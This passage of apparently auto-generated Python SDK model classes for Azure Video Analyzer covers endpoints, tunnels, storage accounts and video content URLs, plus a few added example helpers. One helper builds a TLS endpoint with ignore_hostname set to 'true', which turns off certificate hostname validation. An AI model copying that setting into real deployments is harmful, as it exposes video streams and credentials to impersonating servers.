'transport': {'key': 'transport', 'type': 'str'},
'endpoint': {'key': 'endpoint', 'type': 'EndpointBase'},
}
def __init__(
self,
**kwargs
):
super(RtspSource, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.RtspSource' # type: str
self.transport = kwargs.get('transport', None)
self.endpoint = kwargs['endpoint']
class TunnelBase(msrest.serialization.Model):
"""Base class for tunnel objects.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: SecureIotDeviceRemoteTunnel.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.SecureIotDeviceRemoteTunnel': 'SecureIotDeviceRemoteTunnel'}
}
def __init__(
self,
**kwargs
):
super(TunnelBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class SecureIotDeviceRemoteTunnel(TunnelBase):
"""A remote tunnel securely established using IoT Hub device information.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param iot_hub_name: Required. Name of the IoT Hub.
:type iot_hub_name: str
:param device_id: Required. The IoT device id to use when establishing the remote tunnel. This
string is case-sensitive.
:type device_id: str
"""
_validation = {
'type': {'required': True},
'iot_hub_name': {'required': True},
'device_id': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'iot_hub_name': {'key': 'iotHubName', 'type': 'str'},
'device_id': {'key': 'deviceId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(SecureIotDeviceRemoteTunnel, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.SecureIotDeviceRemoteTunnel' # type: str
self.iot_hub_name = kwargs['iot_hub_name']
self.device_id = kwargs['device_id']
class ServiceSpecification(msrest.serialization.Model):
"""The service metric specifications.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar log_specifications: List of log specifications.
:vartype log_specifications: list[~video_analyzer.models.LogSpecification]
:ivar metric_specifications: List of metric specifications.
:vartype metric_specifications: list[~video_analyzer.models.MetricSpecification]
"""
_validation = {
'log_specifications': {'readonly': True},
'metric_specifications': {'readonly': True},
}
_attribute_map = {
'log_specifications': {'key': 'logSpecifications', 'type': '[LogSpecification]'},
'metric_specifications': {'key': 'metricSpecifications', 'type': '[MetricSpecification]'},
}
def __init__(
self,
**kwargs
):
super(ServiceSpecification, self).__init__(**kwargs)
self.log_specifications = None
self.metric_specifications = None
class SinkNodeBase(NodeBase):
"""Base class for topology sink nodes.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: VideoSink.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param inputs: Required. An array of upstream node references within the topology to be used as
inputs for this node.
:type inputs: list[~video_analyzer.models.NodeInput]
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'inputs': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[NodeInput]'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.VideoSink': 'VideoSink'}
}
def __init__(
self,
**kwargs
):
super(SinkNodeBase, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.SinkNodeBase' # type: str
self.inputs = kwargs['inputs']
class Sku(msrest.serialization.Model):
"""The SKU details.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param name: Required. The SKU name. Possible values include: "Live_S1", "Batch_S1".
:type name: str or ~video_analyzer.models.SkuName
:ivar tier: The SKU tier. Possible values include: "Standard".
:vartype tier: str or ~video_analyzer.models.SkuTier
"""
_validation = {
'name': {'required': True},
'tier': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'tier': {'key': 'tier', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Sku, self).__init__(**kwargs)
self.name = kwargs['name']
self.tier = None
class StorageAccount(msrest.serialization.Model):
"""The details about the associated storage account.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param id: Required. The ID of the storage account resource. Video Analyzer relies on tables,
queues, and blobs. The primary storage account must be a Standard Storage account (either
Microsoft.ClassicStorage or Microsoft.Storage).
:type id: str
:param identity: A managed identity that Video Analyzer will use to access the storage account.
:type identity: ~video_analyzer.models.ResourceIdentity
:ivar status: The current status of the storage account mapping.
:vartype status: str
"""
_validation = {
'id': {'required': True},
'status': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'ResourceIdentity'},
'status': {'key': 'status', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(StorageAccount, self).__init__(**kwargs)
self.id = kwargs['id']
self.identity = kwargs.get('identity', None)
self.status = None
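# Illustrative sketch (editor's note, not part of the generated models): a StorageAccount
# mapping that uses a user-assigned managed identity for access. Both ARM resource IDs
# below are placeholders.
def _example_storage_account():
    return StorageAccount(
        id="/subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.Storage/storageAccounts/<account>",
        identity=ResourceIdentity(
            user_assigned_identity="/subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<identity>",
        ),
    )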
class SystemData(msrest.serialization.Model):
"""Metadata pertaining to creation and last modification of the resource.
:param created_by: The identity that created the resource.
:type created_by: str
:param created_by_type: The type of identity that created the resource. Possible values
include: "User", "Application", "ManagedIdentity", "Key".
:type created_by_type: str or ~video_analyzer.models.CreatedByType
:param created_at: The timestamp of resource creation (UTC).
:type created_at: ~datetime.datetime
:param last_modified_by: The identity that last modified the resource.
:type last_modified_by: str
:param last_modified_by_type: The type of identity that last modified the resource. Possible
values include: "User", "Application", "ManagedIdentity", "Key".
:type last_modified_by_type: str or ~video_analyzer.models.CreatedByType
:param last_modified_at: The timestamp of resource last modification (UTC).
:type last_modified_at: ~datetime.datetime
"""
_attribute_map = {
'created_by': {'key': 'createdBy', 'type': 'str'},
'created_by_type': {'key': 'createdByType', 'type': 'str'},
'created_at': {'key': 'createdAt', 'type': 'iso-8601'},
'last_modified_by': {'key': 'lastModifiedBy', 'type': 'str'},
'last_modified_by_type': {'key': 'lastModifiedByType', 'type': 'str'},
'last_modified_at': {'key': 'lastModifiedAt', 'type': 'iso-8601'},
}
def __init__(
self,
**kwargs
):
super(SystemData, self).__init__(**kwargs)
self.created_by = kwargs.get('created_by', None)
self.created_by_type = kwargs.get('created_by_type', None)
self.created_at = kwargs.get('created_at', None)
self.last_modified_by = kwargs.get('last_modified_by', None)
self.last_modified_by_type = kwargs.get('last_modified_by_type', None)
self.last_modified_at = kwargs.get('last_modified_at', None)
class TimeSequenceBase(msrest.serialization.Model):
"""A sequence of datetime ranges as a string.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: VideoSequenceAbsoluteTimeMarkers.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.VideoSequenceAbsoluteTimeMarkers': 'VideoSequenceAbsoluteTimeMarkers'}
}
def __init__(
self,
**kwargs
):
super(TimeSequenceBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class TlsEndpoint(EndpointBase):
"""TLS endpoint describes an endpoint that the pipeline can connect to over TLS transport (data is encrypted in transit).
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param credentials: Required. Credentials to be presented to the endpoint.
:type credentials: ~video_analyzer.models.CredentialsBase
:param url: Required. The endpoint URL for Video Analyzer to connect to.
:type url: str
:param tunnel: Describes the tunnel through which Video Analyzer can connect to the endpoint
URL. This is an optional property, typically used when the endpoint is behind a firewall.
:type tunnel: ~video_analyzer.models.TunnelBase
:param trusted_certificates: List of trusted certificate authorities when authenticating a TLS
connection. A null list designates that Azure Video Analyzer's list of trusted authorities
should be used.
:type trusted_certificates: ~video_analyzer.models.CertificateSource
:param validation_options: Validation options to use when authenticating a TLS connection. By
default, strict validation is used.
:type validation_options: ~video_analyzer.models.TlsValidationOptions
"""
_validation = {
'type': {'required': True},
'credentials': {'required': True},
'url': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'credentials': {'key': 'credentials', 'type': 'CredentialsBase'},
'url': {'key': 'url', 'type': 'str'},
'tunnel': {'key': 'tunnel', 'type': 'TunnelBase'},
'trusted_certificates': {'key': 'trustedCertificates', 'type': 'CertificateSource'},
'validation_options': {'key': 'validationOptions', 'type': 'TlsValidationOptions'},
}
def __init__(
self,
**kwargs
):
super(TlsEndpoint, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.TlsEndpoint' # type: str
self.trusted_certificates = kwargs.get('trusted_certificates', None)
self.validation_options = kwargs.get('validation_options', None)
class TlsValidationOptions(msrest.serialization.Model):
"""Options for controlling the validation of TLS endpoints.
:param ignore_hostname: When set to 'true', the certificate subject name validation is
skipped. Default is 'false'.
:type ignore_hostname: str
:param ignore_signature: When set to 'true', the certificate chain trust validation is
skipped. Default is 'false'.
:type ignore_signature: str
"""
_attribute_map = {
'ignore_hostname': {'key': 'ignoreHostname', 'type': 'str'},
'ignore_signature': {'key': 'ignoreSignature', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(TlsValidationOptions, self).__init__(**kwargs)
self.ignore_hostname = kwargs.get('ignore_hostname', None)
self.ignore_signature = kwargs.get('ignore_signature', None)
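# Illustrative sketch (editor's note, not part of the generated models): a TlsEndpoint that
# reaches a camera behind a firewall through an IoT Hub device tunnel and relaxes hostname
# validation. The hub name, device id, URL and credential parameters are placeholders.
def _example_tls_endpoint():
    return TlsEndpoint(
        url="rtsps://camera.local:322/stream",
        credentials=UsernamePasswordCredentials(
            username="${rtspUserName}",
            password="${rtspPassword}",
        ),
        tunnel=SecureIotDeviceRemoteTunnel(
            iot_hub_name="example-iot-hub",
            device_id="camera-device-01",
        ),
        validation_options=TlsValidationOptions(ignore_hostname="true"),
    )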
class TokenClaim(msrest.serialization.Model):
"""Properties for expected token claims.
All required parameters must be populated in order to send to Azure.
:param name: Required. Name of the claim which must be present on the token.
:type name: str
:param value: Required. Expected value of the claim to be present on the token.
:type value: str
"""
_validation = {
'name': {'required': True},
'value': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(TokenClaim, self).__init__(**kwargs)
self.name = kwargs['name']
self.value = kwargs['value']
class TrackedResource(Resource):
"""The resource model definition for an Azure Resource Manager tracked top level resource which has 'tags' and a 'location'.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param location: Required. The geo-location where the resource lives.
:type location: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'location': {'required': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'tags': {'key': 'tags', 'type': '{str}'},
'location': {'key': 'location', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(TrackedResource, self).__init__(**kwargs)
self.tags = kwargs.get('tags', None)
self.location = kwargs['location']
class UnsecuredEndpoint(EndpointBase):
"""Unsecured endpoint describes an endpoint that the pipeline can connect to over clear transport (no encryption in transit).
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param credentials: Required. Credentials to be presented to the endpoint.
:type credentials: ~video_analyzer.models.CredentialsBase
:param url: Required. The endpoint URL for Video Analyzer to connect to.
:type url: str
:param tunnel: Describes the tunnel through which Video Analyzer can connect to the endpoint
URL. This is an optional property, typically used when the endpoint is behind a firewall.
:type tunnel: ~video_analyzer.models.TunnelBase
"""
_validation = {
'type': {'required': True},
'credentials': {'required': True},
'url': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'credentials': {'key': 'credentials', 'type': 'CredentialsBase'},
'url': {'key': 'url', 'type': 'str'},
'tunnel': {'key': 'tunnel', 'type': 'TunnelBase'},
}
def __init__(
self,
**kwargs
):
super(UnsecuredEndpoint, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.UnsecuredEndpoint' # type: str
class UserAssignedManagedIdentity(msrest.serialization.Model):
"""The details of the user assigned managed identity used by the Video Analyzer resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar client_id: The client ID.
:vartype client_id: str
:ivar principal_id: The principal ID.
:vartype principal_id: str
"""
_validation = {
'client_id': {'readonly': True},
'principal_id': {'readonly': True},
}
_attribute_map = {
'client_id': {'key': 'clientId', 'type': 'str'},
'principal_id': {'key': 'principalId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(UserAssignedManagedIdentity, self).__init__(**kwargs)
self.client_id = None
self.principal_id = None
class UsernamePasswordCredentials(CredentialsBase):
"""Username and password credentials.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param username: Required. Username to be presented as part of the credentials.
:type username: str
:param password: Required. Password to be presented as part of the credentials. It is
recommended that this value be parameterized as a secret string in order to prevent it from
being returned as part of the resource on API requests.
:type password: str
"""
_validation = {
'type': {'required': True},
'username': {'required': True},
'password': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'username': {'key': 'username', 'type': 'str'},
'password': {'key': 'password', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(UsernamePasswordCredentials, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.UsernamePasswordCredentials' # type: str
self.username = kwargs['username']
self.password = kwargs['password']
class VideoAnalyzer(TrackedResource):
"""The Video Analyzer account.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param location: Required. The geo-location where the resource lives.
:type location: str
:param identity: The identities associated to the Video Analyzer resource.
:type identity: ~video_analyzer.models.VideoAnalyzerIdentity
:param storage_accounts: The storage accounts for this resource.
:type storage_accounts: list[~video_analyzer.models.StorageAccount]
:ivar endpoints: The endpoints associated with this resource.
:vartype endpoints: list[~video_analyzer.models.Endpoint]
:param encryption: The account encryption properties.
:type encryption: ~video_analyzer.models.AccountEncryption
:param iot_hubs: The IoT Hubs for this resource.
:type iot_hubs: list[~video_analyzer.models.IotHub]
:param public_network_access: Whether or not public network access is allowed for resources
under the Video Analyzer account. Possible values include: "Enabled", "Disabled".
:type public_network_access: str or ~video_analyzer.models.PublicNetworkAccess
:param network_access_control: Network access control for Video Analyzer.
:type network_access_control: ~video_analyzer.models.NetworkAccessControl
:ivar provisioning_state: Provisioning state of the Video Analyzer account. Possible values
include: "Failed", "InProgress", "Succeeded".
:vartype provisioning_state: str or ~video_analyzer.models.ProvisioningState
:ivar private_endpoint_connections: Private Endpoint Connections created under Video Analyzer
account.
:vartype private_endpoint_connections: list[~video_analyzer.models.PrivateEndpointConnection]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'location': {'required': True},
'endpoints': {'readonly': True},
'provisioning_state': {'readonly': True},
'private_endpoint_connections': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'tags': {'key': 'tags', 'type': '{str}'},
'location': {'key': 'location', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'VideoAnalyzerIdentity'},
'storage_accounts': {'key': 'properties.storageAccounts', 'type': '[StorageAccount]'},
'endpoints': {'key': 'properties.endpoints', 'type': '[Endpoint]'},
'encryption': {'key': 'properties.encryption', 'type': 'AccountEncryption'},
'iot_hubs': {'key': 'properties.iotHubs', 'type': '[IotHub]'},
'public_network_access': {'key': 'properties.publicNetworkAccess', 'type': 'str'},
'network_access_control': {'key': 'properties.networkAccessControl', 'type': 'NetworkAccessControl'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'private_endpoint_connections': {'key': 'properties.privateEndpointConnections', 'type': '[PrivateEndpointConnection]'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzer, self).__init__(**kwargs)
self.identity = kwargs.get('identity', None)
self.storage_accounts = kwargs.get('storage_accounts', None)
self.endpoints = None
self.encryption = kwargs.get('encryption', None)
self.iot_hubs = kwargs.get('iot_hubs', None)
self.public_network_access = kwargs.get('public_network_access', None)
self.network_access_control = kwargs.get('network_access_control', None)
self.provisioning_state = None
self.private_endpoint_connections = None
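# Illustrative sketch (editor's note, not part of the generated models): a VideoAnalyzer
# account payload that pairs a storage account with a user-assigned managed identity.
# Resource IDs, the region and the identity type string are placeholders following the
# patterns documented above.
def _example_video_analyzer_account():
    identity_id = "/subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<identity>"
    return VideoAnalyzer(
        location="westus2",
        identity=VideoAnalyzerIdentity(
            type="UserAssigned",
            user_assigned_identities={identity_id: UserAssignedManagedIdentity()},
        ),
        storage_accounts=[
            StorageAccount(
                id="/subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.Storage/storageAccounts/<account>",
                identity=ResourceIdentity(user_assigned_identity=identity_id),
            )
        ],
    )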
class VideoAnalyzerCollection(msrest.serialization.Model):
"""A collection of VideoAnalyzer items.
:param value: A collection of VideoAnalyzer items.
:type value: list[~video_analyzer.models.VideoAnalyzer]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[VideoAnalyzer]'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class VideoAnalyzerIdentity(msrest.serialization.Model):
"""The managed identity for the Video Analyzer resource.
All required parameters must be populated in order to send to Azure.
:param type: Required. The identity type.
:type type: str
:param user_assigned_identities: The User Assigned Managed Identities.
:type user_assigned_identities: dict[str, ~video_analyzer.models.UserAssignedManagedIdentity]
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'user_assigned_identities': {'key': 'userAssignedIdentities', 'type': '{UserAssignedManagedIdentity}'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerIdentity, self).__init__(**kwargs)
self.type = kwargs['type']
self.user_assigned_identities = kwargs.get('user_assigned_identities', None)
class VideoAnalyzerOperationStatus(msrest.serialization.Model):
"""Status of video analyzer operation.
All required parameters must be populated in order to send to Azure.
:param name: Required. Operation identifier.
:type name: str
:param id: Operation resource ID.
:type id: str
:param start_time: Operation start time.
:type start_time: str
:param end_time: Operation end time.
:type end_time: str
:param status: Operation status.
:type status: str
:param error: The error detail.
:type error: ~video_analyzer.models.ErrorDetail
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'start_time': {'key': 'startTime', 'type': 'str'},
'end_time': {'key': 'endTime', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerOperationStatus, self).__init__(**kwargs)
self.name = kwargs['name']
self.id = kwargs.get('id', None)
self.start_time = kwargs.get('start_time', None)
self.end_time = kwargs.get('end_time', None)
self.status = kwargs.get('status', None)
self.error = kwargs.get('error', None)
class VideoAnalyzerPrivateEndpointConnectionOperationStatus(msrest.serialization.Model):
"""Status of private endpoint connection operation.
All required parameters must be populated in order to send to Azure.
:param name: Required. Operation identifier.
:type name: str
:param id: Operation resource ID.
:type id: str
:param start_time: Operation start time.
:type start_time: str
:param end_time: Operation end time.
:type end_time: str
:param status: Operation status.
:type status: str
:param error: The error detail.
:type error: ~video_analyzer.models.ErrorDetail
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'start_time': {'key': 'startTime', 'type': 'str'},
'end_time': {'key': 'endTime', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerPrivateEndpointConnectionOperationStatus, self).__init__(**kwargs)
self.name = kwargs['name']
self.id = kwargs.get('id', None)
self.start_time = kwargs.get('start_time', None)
self.end_time = kwargs.get('end_time', None)
self.status = kwargs.get('status', None)
self.error = kwargs.get('error', None)
class VideoAnalyzerUpdate(msrest.serialization.Model):
"""The update operation for a Video Analyzer account.
Variables are only populated by the server, and will be ignored when sending a request.
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param identity: The identities associated to the Video Analyzer resource.
:type identity: ~video_analyzer.models.VideoAnalyzerIdentity
:param storage_accounts: The storage accounts for this resource.
:type storage_accounts: list[~video_analyzer.models.StorageAccount]
:ivar endpoints: The endpoints associated with this resource.
:vartype endpoints: list[~video_analyzer.models.Endpoint]
:param encryption: The account encryption properties.
:type encryption: ~video_analyzer.models.AccountEncryption
:param iot_hubs: The IoT Hubs for this resource.
:type iot_hubs: list[~video_analyzer.models.IotHub]
:param public_network_access: Whether or not public network access is allowed for resources
under the Video Analyzer account. Possible values include: "Enabled", "Disabled".
:type public_network_access: str or ~video_analyzer.models.PublicNetworkAccess
:param network_access_control: Network access control for Video Analyzer.
:type network_access_control: ~video_analyzer.models.NetworkAccessControl
:ivar provisioning_state: Provisioning state of the Video Analyzer account. Possible values
include: "Failed", "InProgress", "Succeeded".
:vartype provisioning_state: str or ~video_analyzer.models.ProvisioningState
:ivar private_endpoint_connections: Private Endpoint Connections created under Video Analyzer
account.
:vartype private_endpoint_connections: list[~video_analyzer.models.PrivateEndpointConnection]
"""
_validation = {
'endpoints': {'readonly': True},
'provisioning_state': {'readonly': True},
'private_endpoint_connections': {'readonly': True},
}
_attribute_map = {
'tags': {'key': 'tags', 'type': '{str}'},
'identity': {'key': 'identity', 'type': 'VideoAnalyzerIdentity'},
'storage_accounts': {'key': 'properties.storageAccounts', 'type': '[StorageAccount]'},
'endpoints': {'key': 'properties.endpoints', 'type': '[Endpoint]'},
'encryption': {'key': 'properties.encryption', 'type': 'AccountEncryption'},
'iot_hubs': {'key': 'properties.iotHubs', 'type': '[IotHub]'},
'public_network_access': {'key': 'properties.publicNetworkAccess', 'type': 'str'},
'network_access_control': {'key': 'properties.networkAccessControl', 'type': 'NetworkAccessControl'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'private_endpoint_connections': {'key': 'properties.privateEndpointConnections', 'type': '[PrivateEndpointConnection]'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerUpdate, self).__init__(**kwargs)
self.tags = kwargs.get('tags', None)
self.identity = kwargs.get('identity', None)
self.storage_accounts = kwargs.get('storage_accounts', None)
self.endpoints = None
self.encryption = kwargs.get('encryption', None)
self.iot_hubs = kwargs.get('iot_hubs', None)
self.public_network_access = kwargs.get('public_network_access', None)
self.network_access_control = kwargs.get('network_access_control', None)
self.provisioning_state = None
self.private_endpoint_connections = None
class VideoArchival(msrest.serialization.Model):
"""Video archival properties.
:param retention_period: Video retention period indicates the maximum age of the video archive
segments which are intended to be kept in storage. It must be provided in ISO8601 duration
format at the granularity of days, up to a maximum of 10 years. For example, if this is set to
P30D (30 days), content older than 30 days will be periodically deleted. This value can be
updated at any time and the new desired retention period will be effective within 24 hours.
:type retention_period: str
"""
_attribute_map = {
'retention_period': {'key': 'retentionPeriod', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoArchival, self).__init__(**kwargs)
self.retention_period = kwargs.get('retention_period', None)
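# Illustrative sketch (editor's note, not part of the generated models): a 30-day archive
# retention policy expressed as an ISO8601 duration, matching the P30D example above.
def _example_video_archival():
    return VideoArchival(retention_period="P30D")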
class VideoContentToken(msrest.serialization.Model):
""""Video content token grants access to the video content URLs.".
Variables are only populated by the server, and will be ignored when sending a request.
:ivar expiration_date: The content token expiration date in ISO8601 format (eg.
2021-01-01T00:00:00Z).
:vartype expiration_date: ~datetime.datetime
:ivar token: The content token value to be added to the video content URL as the value for the
"token" query string parameter. The token is specific to a single video.
:vartype token: str
"""
_validation = {
'expiration_date': {'readonly': True},
'token': {'readonly': True},
}
_attribute_map = {
'expiration_date': {'key': 'expirationDate', 'type': 'iso-8601'},
'token': {'key': 'token', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoContentToken, self).__init__(**kwargs)
self.expiration_date = None
self.token = None
class VideoContentUrls(msrest.serialization.Model):
"""Set of URLs to the video content.
:param download_url: Video file download URL. This URL can be used in conjunction with the
video content authorization token to download the video MP4 file. The resulting MP4 file can be
played on any standard media player. It is available when the video type is 'file' and the
video file is available for consumption.
:type download_url: str
:param archive_base_url: Video archive streaming base URL. The archived content can be
automatically played by the Azure Video Analyzer player widget. Alternatively, this URL can be
used in conjunction with the video content authorization token on any compatible DASH or HLS
players by appending the following to the base URL:
.. code-block::
- HLSv4: /manifest(format=m3u8-aapl).m3u8
- HLS CMAF: /manifest(format=m3u8-cmaf)
- DASH CMAF: /manifest(format=mpd-time-cmaf)
Moreover, an ongoing video recording can be played in "live mode" with latencies which are
approximately double the chosen video segment length. It is available when the video type is
'archive' and video archiving is enabled.
:type archive_base_url: str
:param rtsp_tunnel_url: Video low-latency streaming URL. The live content can be automatically
played by the Azure Video Analyzer player widget. Alternatively, this URL can be used in
conjunction with the video content authorization token to expose a WebSocket tunneled RTSP
stream. It is available when the video type is 'archive' and a live, low-latency feed is
available from the source.
:type rtsp_tunnel_url: str
:param preview_image_urls: Video preview image URLs. These URLs can be used in conjunction with
the video content authorization token to download the most recent still image from the video
archive in different resolutions. They are available when the video type is 'archive' and
preview images are enabled.
:type preview_image_urls: ~video_analyzer.models.VideoPreviewImageUrls
"""
_attribute_map = {
'download_url': {'key': 'downloadUrl', 'type': 'str'},
'archive_base_url': {'key': 'archiveBaseUrl', 'type': 'str'},
'rtsp_tunnel_url': {'key': 'rtspTunnelUrl', 'type': 'str'},
'preview_image_urls': {'key': 'previewImageUrls', 'type': 'VideoPreviewImageUrls'},
}
def __init__(
self,
**kwargs
):
super(VideoContentUrls, self).__init__(**kwargs)
self.download_url = kwargs.get('download_url', None)
self.archive_base_url = kwargs.get('archive_base_url', None)
self.rtsp_tunnel_url = kwargs.get('rtsp_tunnel_url', None)
self.preview_image_urls = kwargs.get('preview_image_urls', None)
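# Illustrative sketch (editor's note, not part of the generated models): composing an HLS
# playback URL from server-populated VideoContentUrls and VideoContentToken values, using
# the manifest suffix and "token" query string parameter described in the docstrings above.
def _example_hls_playback_url(content_urls, content_token):
    # content_urls: VideoContentUrls; content_token: VideoContentToken (both returned by the service).
    return "{}/manifest(format=m3u8-aapl).m3u8?token={}".format(
        content_urls.archive_base_url, content_token.token
    )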
class VideoCreationProperties(msrest.serialization.Model):
"""Optional properties to be used in case a new video resource needs to be created on the service. These will not take effect if the video already exists.
:param title: Optional title provided by the user. Value can be up to 256 characters long.
:type title: str
:param description: Optional description provided by the user. Value can be up to 2048
characters long.
:type description: str
:param segment_length: Segment length indicates the length of individual content files
(segments) which are persisted to storage. Smaller segments provide lower archive playback
latency but generate a larger volume of storage transactions. Larger segments reduce the amount
of storage transactions while increasing the archive playback latency. Value must be specified
in ISO8601 duration format (e.g. "PT30S" equals 30 seconds) and can range from 30 seconds to
5 minutes, in 30-second increments. Changing this value after the initial call to create the
video resource can lead to errors when uploading content to the archive. Default value is 30
seconds. This property is only allowed for topologies where "kind" is set to "live".
:type segment_length: str
:param retention_period: Video retention period indicates how long the video is kept in
storage. Value must be specified in ISO8601 duration format (e.g. "P1D" equals 1 day) and can
range from 1 day to 10 years, in 1-day increments. When absent (null), all video content is
retained indefinitely. This property is only allowed for topologies where "kind" is set to
"live".
:type retention_period: str
"""
_attribute_map = {
'title': {'key': 'title', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'segment_length': {'key': 'segmentLength', 'type': 'str'},
'retention_period': {'key': 'retentionPeriod', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoCreationProperties, self).__init__(**kwargs)
self.title = kwargs.get('title', None)
self.description = kwargs.get('description', None)
